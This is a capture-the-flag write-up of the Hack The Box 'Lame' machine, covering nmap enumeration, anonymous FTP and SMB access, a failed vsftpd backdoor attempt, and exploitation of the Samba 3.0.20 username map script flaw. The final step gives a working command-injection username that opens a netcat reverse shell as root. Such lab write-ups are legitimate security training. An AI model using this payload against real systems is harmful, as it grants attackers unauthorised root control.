Lame Writeup

10 September 2022 #CTF #HTB #box #easy #linux

Lame info


Let's start with an nmap scan:

$ sudo nmap -sC -sV -oN enum/lame
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user


Since we have anonymous access, let's check if there are any interesting files (you can type anything as password):

$ ftp anonymous@
Connected to
220 (vsFTPd 2.3.4)
331 Please specify the password.
230 Login successful.
ftp> ls -a
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..

Looks like it's empty...


We also have anonymous access for SMB, so we'll list the shares:

$ smbclient -N -L
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

Shares that end with '$' are usually administrative shares, so it's no surprise we can't access them.

We can connect to the tmp share but there are just some log files, which are not interesting for us:

$ smbclient -N '//'
Anonymous login successful
smb: \> ls
  .                                   D        0  Wed Aug 17 13:03:46 2022
  ..                                 DR        0  Sat Oct 31 02:33:58 2020
  5577.jsvc_up                        R        0  Wed Aug 17 10:56:11 2022
  .ICE-unix                          DH        0  Wed Aug 17 10:55:07 2022
  vmware-root                        DR        0  Wed Aug 17 10:55:36 2022
  .X11-unix                          DH        0  Wed Aug 17 10:55:33 2022
  .X0-lock                           HR       11  Wed Aug 17 10:55:33 2022
  vgauthsvclog.txt.0                  R     1600  Wed Aug 17 10:55:04 2022



vsftpd 2.3.4 is kind of a 'famous' version because it is vulnerable to CVE-2011-2523 which is a backdoor command execution.
This backdoor is triggered when the attacker logs in with a username that contains ':)' and opens a remote shell on port 6200 (yes really).

We will try to exploit it manually (but you can also use the metasploit module if you really want)

First, connect to the FTP server:

$ nc 21
220 (vsFTPd 2.3.4)
USER hehe:)
331 Please specify the password.
PASS hihi

Then try to connect to the remote shell:

$ nc 6200

No shell in sight...


Maybe the samba version is also vulnerable (know knows)?

$ searchsploit 'samba 3.0.20'
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)

It is !

This exploit is possible when a specific config option is set. Then, by attempting to log in with a username containing special metacharacters, an attacker can execute arbitrary commands.

There is a metasploit module for this that will do all the work for you but that's no fun right ? (and it's not a lot of work anyways)

Setup your reverse shell listener: nc -lvnp 4242 then connect to the only share we have access to:

$ smbclient -N '//'
Anonymous login successful
smb: \> logon "/=`nohup nc -e /bin/bash 4242`"

(I just copied the payload in the metasploit script)


And here is your reverse shell as root! Now up to you to grab the user.txt and root.txt...

Key Takeaways